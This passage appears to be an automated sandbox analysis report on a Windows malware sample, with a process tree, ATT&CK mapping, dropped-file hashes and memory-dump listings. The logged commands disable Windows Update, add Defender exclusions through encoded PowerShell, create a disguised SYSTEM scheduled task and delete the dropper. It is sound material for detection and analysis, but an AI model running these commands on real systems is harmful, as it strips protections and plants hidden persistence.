"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:1576

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
PID:1080

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:1788

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "gnkvzaivrlft"
5⤵
PID:808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:588

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{842ca563-61ab-497b-9870-19d81160ce08}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{832cfe56-f95e-4812-b0ca-c99bad1e1a7e}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:2012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1284

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:856

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:832

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1444

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:852

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:624

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1184

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1680

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1712

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1984

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1748

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1608

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1544

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2016

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1292

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1628

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1816

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:336

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1508

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
3⤵
PID:852

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
4⤵
- Creates scheduled task(s)
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "
3⤵
PID:2004

C:\Windows\system32\schtasks.exe
schtasks /run /tn "Microsoft Edge Update "
4⤵
PID:112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
3⤵
- Deletes itself
PID:1680

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:812

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16722080571535217169-1709542500797918760-12076781451520547095-1779057725-1623862751"
1⤵
PID:1616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "73951558960456821916771466051598096447-11099653921517918713434235951165182873"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2009859479288353930655199290-1131329329-1466946350-2058103679-1568932160-964576090"
1⤵
PID:1980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3642886732841802791347033148-5762311441526193446-4978928431630435496-1364049561"
1⤵
PID:1360

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
Filesize
4.9MB

MD5
619c8566b61a49d28d25590a16611849

SHA1
d6c75e985d9ae6ff79b29bf39cac1d7514e7a473

SHA256
aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2

SHA512
a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363

Download Submit
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
Filesize
4.9MB

MD5
619c8566b61a49d28d25590a16611849

SHA1
d6c75e985d9ae6ff79b29bf39cac1d7514e7a473

SHA256
aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2

SHA512
a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
de247aaaeae861766c4fe157f263aead

SHA1
b224133859b8c57eb3ac439e35242dfba6af20cd

SHA256
7d832279f047a2c8a78d6b43a5c75812bbf5bfe2dd39b6036859bd955cdefdbd

SHA512
2d0b484c62495b059bfba45bd00450546fa21e08758c7dd354c0a10b01bf1c046fa5f59f13dcc09ae1545122bc17596737ca02991a772a6f2fd8ebc31a50d301

Download Submit
C:\Windows\Tasks\dialersvc64.job
Filesize
1KB

MD5
abbd0191a24bc43b59af8f4d68925168

SHA1
fc003822bb3d537bc54b4c64d01131c8a9180bfd

SHA256
225c5b1e38324bbd6e73c5828b04a5746f4c5b94ecccf9c8e9c1ab3eb8edc248

SHA512
77d6e7d4c131958f1b6e6a9382a497a3e49e7f262a345511a8c5b62f0c3baef374c7e8f5a3ebbda57b3b7996b0d87f323442117b09d21600f394bfda399e5067

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
3KB

MD5
e546b81f1a1a1b753a4f6d3455394dec

SHA1
14f407db119dd97ed248be2a8d15a09ba938987a

SHA256
1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8

SHA512
03f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
Filesize
4.9MB

MD5
619c8566b61a49d28d25590a16611849

SHA1
d6c75e985d9ae6ff79b29bf39cac1d7514e7a473

SHA256
aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2

SHA512
a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363

Download Submit
memory/108-421-0x0000000000000000-mapping.dmp

Download
memory/112-117-0x0000000000000000-mapping.dmp

Download
memory/272-246-0x0000000001160000-0x000000000118A000-memory.dmp

Filesize
168KB

Download
memory/316-371-0x0000000000000000-mapping.dmp

Download
memory/316-467-0x0000000000000000-mapping.dmp

Download
memory/336-92-0x0000000000000000-mapping.dmp

Download
memory/416-156-0x0000000000860000-0x000000000088A000-memory.dmp

Filesize
168KB

Download
memory/416-149-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/416-145-0x0000000000720000-0x0000000000743000-memory.dmp

Filesize
140KB

Download
memory/416-148-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/416-303-0x0000000000860000-0x000000000088A000-memory.dmp

Filesize
168KB

Download
memory/416-153-0x0000000000720000-0x0000000000743000-memory.dmp

Filesize
140KB

Download
memory/460-163-0x0000000000210000-0x000000000023A000-memory.dmp

Filesize
168KB

Download
memory/460-155-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/460-152-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/476-304-0x0000000000170000-0x000000000019A000-memory.dmp

Filesize
168KB

Download
memory/476-158-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/476-160-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/476-165-0x0000000000170000-0x000000000019A000-memory.dmp

Filesize
168KB

Download
memory/484-166-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/484-168-0x00000000003B0000-0x00000000003DA000-memory.dmp

Filesize
168KB

Download
memory/484-171-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/544-346-0x0000000000000000-mapping.dmp

Download
memory/572-101-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-110-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-114-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-107-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-108-0x0000000140001844-mapping.dmp

Download
memory/572-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-104-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-103-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-102-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-96-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-97-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/572-99-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/580-514-0x0000000000000000-mapping.dmp

Download
memory/588-172-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/588-174-0x0000000000490000-0x00000000004BA000-memory.dmp

Filesize
168KB

Download
memory/588-173-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/604-255-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/604-254-0x0000000001DA0000-0x0000000001DCA000-memory.dmp

Filesize
168KB

Download
memory/624-75-0x0000000000000000-mapping.dmp

Download
memory/664-244-0x0000000000490000-0x00000000004BA000-memory.dmp

Filesize
168KB

Download
memory/736-413-0x0000000000000000-mapping.dmp

Download
memory/744-397-0x0000000000000000-mapping.dmp

Download
memory/748-181-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp

Filesize
64KB

Download
memory/748-183-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/748-245-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

Filesize
168KB

Download
memory/796-247-0x00000000008F0000-0x000000000091A000-memory.dmp

Filesize
168KB

Download
memory/796-248-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/808-414-0x0000000000000000-mapping.dmp

Download
memory/812-118-0x0000000000000000-mapping.dmp

Download
memory/832-70-0x0000000000000000-mapping.dmp

Download
memory/836-249-0x00000000009C0000-0x00000000009EA000-memory.dmp

Filesize
168KB

Download
memory/836-250-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/852-277-0x0000000000180000-0x00000000001A1000-memory.dmp

Filesize
132KB

Download
memory/852-112-0x0000000000000000-mapping.dmp

Download
memory/852-278-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/852-73-0x0000000000000000-mapping.dmp

Download
memory/852-276-0x00000000000E0000-0x00000000000FB000-memory.dmp

Filesize
108KB

Download
memory/856-68-0x0000000000000000-mapping.dmp

Download
memory/868-252-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/868-251-0x0000000000910000-0x000000000093A000-memory.dmp

Filesize
168KB

Download
memory/900-431-0x0000000000000000-mapping.dmp

Download
memory/920-69-0x0000000000000000-mapping.dmp

Download
memory/944-368-0x0000000000000000-mapping.dmp

Download
memory/944-91-0x0000000000000000-mapping.dmp

Download
memory/956-483-0x0000000000000000-mapping.dmp

Download
memory/1008-82-0x0000000000000000-mapping.dmp

Download
memory/1020-67-0x0000000000000000-mapping.dmp

Download
memory/1060-253-0x00000000007B0000-0x00000000007DA000-memory.dmp

Filesize
168KB

Download
memory/1076-135-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1076-159-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1076-305-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/1076-141-0x00000000776F0000-0x000000007780F000-memory.dmp

Filesize
1.1MB

Download
memory/1076-161-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/1076-269-0x0000000000ED0000-0x0000000000EFA000-memory.dmp

Filesize
168KB

Download
memory/1076-139-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/1076-136-0x00000001400033F4-mapping.dmp

Download
memory/1076-138-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1080-120-0x0000000000000000-mapping.dmp

Download
memory/1080-365-0x0000000000000000-mapping.dmp

Download
memory/1088-261-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/1088-260-0x0000000000850000-0x000000000087A000-memory.dmp

Filesize
168KB

Download
memory/1120-256-0x0000000001F50000-0x0000000001F7A000-memory.dmp

Filesize
168KB

Download
memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmp

Filesize
9.5MB

Download
memory/1176-124-0x0000000000000000-mapping.dmp

Download
memory/1176-268-0x0000000001150000-0x000000000117A000-memory.dmp

Filesize
168KB

Download
memory/1184-76-0x0000000000000000-mapping.dmp

Download
memory/1192-257-0x0000000001E10000-0x0000000001E3A000-memory.dmp

Filesize
168KB

Download
memory/1208-332-0x0000000000000000-mapping.dmp

Download
memory/1224-301-0x0000000000A70000-0x0000000000A9A000-memory.dmp

Filesize
168KB

Download
memory/1224-302-0x00000000012EB000-0x000000000130A000-memory.dmp

Filesize
124KB

Download
memory/1224-298-0x0000000000A70000-0x0000000000A9A000-memory.dmp

Filesize
168KB

Download
memory/1224-299-0x00000000012EB000-0x000000000130A000-memory.dmp

Filesize
124KB

Download
memory/1224-300-0x00000000012E4000-0x00000000012E7000-memory.dmp

Filesize
12KB

Download
memory/1224-294-0x0000000000130000-0x000000000015A000-memory.dmp

Filesize
168KB

Download
memory/1224-284-0x0000000000000000-mapping.dmp

Download
memory/1224-295-0x00000000012E4000-0x00000000012E7000-memory.dmp

Filesize
12KB

Download
memory/1244-61-0x000007FEEDDE0000-0x000007FEEE803000-memory.dmp

Filesize
10.1MB

Download
memory/1244-62-0x000007FEED280000-0x000007FEEDDDD000-memory.dmp

Filesize
11.4MB

Download
memory/1244-59-0x0000000000000000-mapping.dmp

Download
memory/1244-63-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1244-64-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1244-65-0x00000000026AB000-0x00000000026CA000-memory.dmp

Filesize
124KB

Download
memory/1284-259-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/1284-258-0x0000000002A70000-0x0000000002A9A000-memory.dmp

Filesize
168KB

Download
memory/1292-88-0x0000000000000000-mapping.dmp

Download
memory/1344-113-0x0000000000000000-mapping.dmp

Download
memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp

Filesize
9.5MB

Download
memory/1352-95-0x00000000005F0000-0x00000000005F6000-memory.dmp

Filesize
24KB

Download
memory/1352-57-0x000000001C200000-0x000000001C660000-memory.dmp

Filesize
4.4MB

Download
memory/1352-58-0x000007FEFC091000-0x000007FEFC093000-memory.dmp

Filesize
8KB

Download
memory/1360-443-0x0000000000000000-mapping.dmp

Download
memory/1412-80-0x0000000000000000-mapping.dmp

Download
memory/1444-72-0x0000000000000000-mapping.dmp

Download
memory/1492-66-0x0000000000000000-mapping.dmp

Download
memory/1496-452-0x0000000000000000-mapping.dmp

Download
memory/1508-93-0x0000000000000000-mapping.dmp

Download
memory/1516-85-0x0000000000000000-mapping.dmp

Download
memory/1532-270-0x0000000000370000-0x000000000039A000-memory.dmp

Filesize
168KB

Download
memory/1544-86-0x0000000000000000-mapping.dmp

Download
memory/1576-339-0x0000000000000000-mapping.dmp

Download
memory/1608-84-0x0000000000000000-mapping.dmp

Download
memory/1616-267-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/1616-266-0x0000000000760000-0x000000000078A000-memory.dmp

Filesize
168KB

Download
memory/1628-89-0x0000000000000000-mapping.dmp

Download
memory/1632-263-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/1632-262-0x0000000000920000-0x000000000094A000-memory.dmp

Filesize
168KB

Download
memory/1640-74-0x0000000000000000-mapping.dmp

Download
memory/1644-71-0x0000000000000000-mapping.dmp

Download
memory/1676-507-0x0000000000000000-mapping.dmp

Download
memory/1680-116-0x0000000000000000-mapping.dmp

Download
memory/1680-78-0x0000000000000000-mapping.dmp

Download
memory/1712-79-0x0000000000000000-mapping.dmp

Download
memory/1748-83-0x0000000000000000-mapping.dmp

Download
memory/1776-473-0x0000000000000000-mapping.dmp

Download
memory/1788-399-0x0000000000000000-mapping.dmp

Download
memory/1816-90-0x0000000000000000-mapping.dmp

Download
memory/1820-94-0x0000000000000000-mapping.dmp

Download
memory/1976-297-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/1976-296-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/1984-81-0x0000000000000000-mapping.dmp

Download
memory/2000-142-0x0000000000EBB000-0x0000000000EDA000-memory.dmp

Filesize
124KB

Download
memory/2000-143-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/2000-140-0x0000000000EB4000-0x0000000000EB7000-memory.dmp

Filesize
12KB

Download
memory/2000-144-0x00000000776F0000-0x000000007780F000-memory.dmp

Filesize
1.1MB

Download
memory/2000-134-0x00000000776F0000-0x000000007780F000-memory.dmp

Filesize
1.1MB

Download
memory/2000-495-0x0000000000000000-mapping.dmp

Download
memory/2000-133-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/2000-119-0x0000000000000000-mapping.dmp

Download
memory/2000-127-0x000007FEF3B50000-0x000007FEF46AD000-memory.dmp

Filesize
11.4MB

Download
memory/2000-130-0x0000000000EB4000-0x0000000000EB7000-memory.dmp

Filesize
12KB

Download
memory/2000-126-0x000007FEF46B0000-0x000007FEF50D3000-memory.dmp

Filesize
10.1MB

Download
memory/2000-458-0x0000000000000000-mapping.dmp

Download
memory/2004-77-0x0000000000000000-mapping.dmp

Download
memory/2004-115-0x0000000000000000-mapping.dmp

Download
memory/2012-264-0x00000000007B0000-0x00000000007DA000-memory.dmp

Filesize
168KB

Download
memory/2012-265-0x0000000037850000-0x0000000037860000-memory.dmp

Filesize
64KB

Download
memory/2016-87-0x0000000000000000-mapping.dmp

Download
memory/2016-347-0x0000000000000000-mapping.dmp

Download